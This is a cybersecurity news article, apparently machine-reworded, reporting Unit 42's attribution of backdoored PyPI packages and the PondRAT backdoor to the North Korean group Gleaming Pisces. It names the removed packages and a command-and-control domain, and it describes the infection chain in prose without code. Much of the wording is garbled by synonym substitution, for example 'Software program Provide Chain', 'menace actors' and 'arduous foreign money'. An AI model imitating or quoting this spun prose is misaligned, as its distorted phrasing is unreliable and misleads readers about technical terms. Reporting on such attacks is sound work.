North Korea Targets Software program Provide Chain Through PyPI
3rd Party Risk Management
,
Cyberwarfare / Nation-State Attacks
,
Fraud Management & Cybercrime
Backdoored Python Packages Possible Work of ‘Gleaming Pisces,’ Says Palo Alto
A North Korean hacking group with a history of a stealing cryptocurrency is likely behind a raft of poisoned Python packages targeting developers working on the Linux and macOS operating systems in an apparent attempt at a supply chain attack.
See Also: Tracking and Mitigating Emerging Threats in Third-Party Risk Management
Researchers at Palo Alto’s Unit 42 attributed a marketing campaign through which malware-laden Python code is uploaded to the PyPI open-source repository to the North Korea-linked APT group tracked as “Gleaming Pisces,” with medium confidence.
Also called Citrine Sleet, the group’s fame comes from distributing a version of AppleJeus malware focused at cryptocurrency merchants.
The an infection chain consists of a number of Python packages that decode and execute encoded code. “After Python put in and loaded the malicious bundle, a malicious piece of code finally ran a number of bash instructions to obtain the RAT, modifying its permissions and executing it,” the researchers mentioned.
The North Korean hereditary Juche absolutist monarchy actively steals cryptocurrency to fund weapons of mass destruction growth and inject arduous foreign money into the extremely sanctioned financial system. Pyongyang AppleJeus hackers have focused the software program provide chain prior to now – succeeding past expectations in 2023 when a flaw inserted into an out of date buying and selling software program bundle led them to compromising a desktop cellphone software made by 3CX and utilized by multinational firms together with Toyota, Coca-Cola and Air France (see: North Korean Hackers Chained Supply Chain Hacks to Reach 3CX).
PyPI, a extensively used repository of Python libraries, has been the repeated goal of malicious customers. Directors in March halted new consumer registrations for a second time after menace actors flooded the repository with typosquatted variations of well-known packages to deceive builders (see: Malware Flood Causes PyPI to Temporarily Halt New Accounts).
“We assess that the menace actor’s goal was to safe entry to produce chain distributors via builders’ endpoints and subsequently achieve entry to the distributors’ clients’ endpoints,” the researchers mentioned.
The malicious packages noticed by Palo Alto are now not out there on PyPI, however the impression on organizations utilizing contaminated third-party software program stays vital, they added.
The North Korean attribution comes after researchers discovered overlapping code construction, identification perform names and encryption keys and comparable execution flows with a earlier AppleJeus backdoor. Palo Alto named the backdoor on this marketing campaign PondRAT. It shares many traits with PoolRat, a recognized North Korean backdoor that Mandiant spotted within the 2023 provide chain assault in opposition to 3CX.
A PondRAT variant noticed by Palo Alto for macOS additionally used rebelthumb.web
as its command-and-control area. Volexity in 2022 identified the hostname as an AppleJeus server.
The now-removed Python packages are: real-ids
with 893 downloads, coloredtxt
with 381 downloads; beautifultext
with 736 downloads, and minisound
with 416 downloads.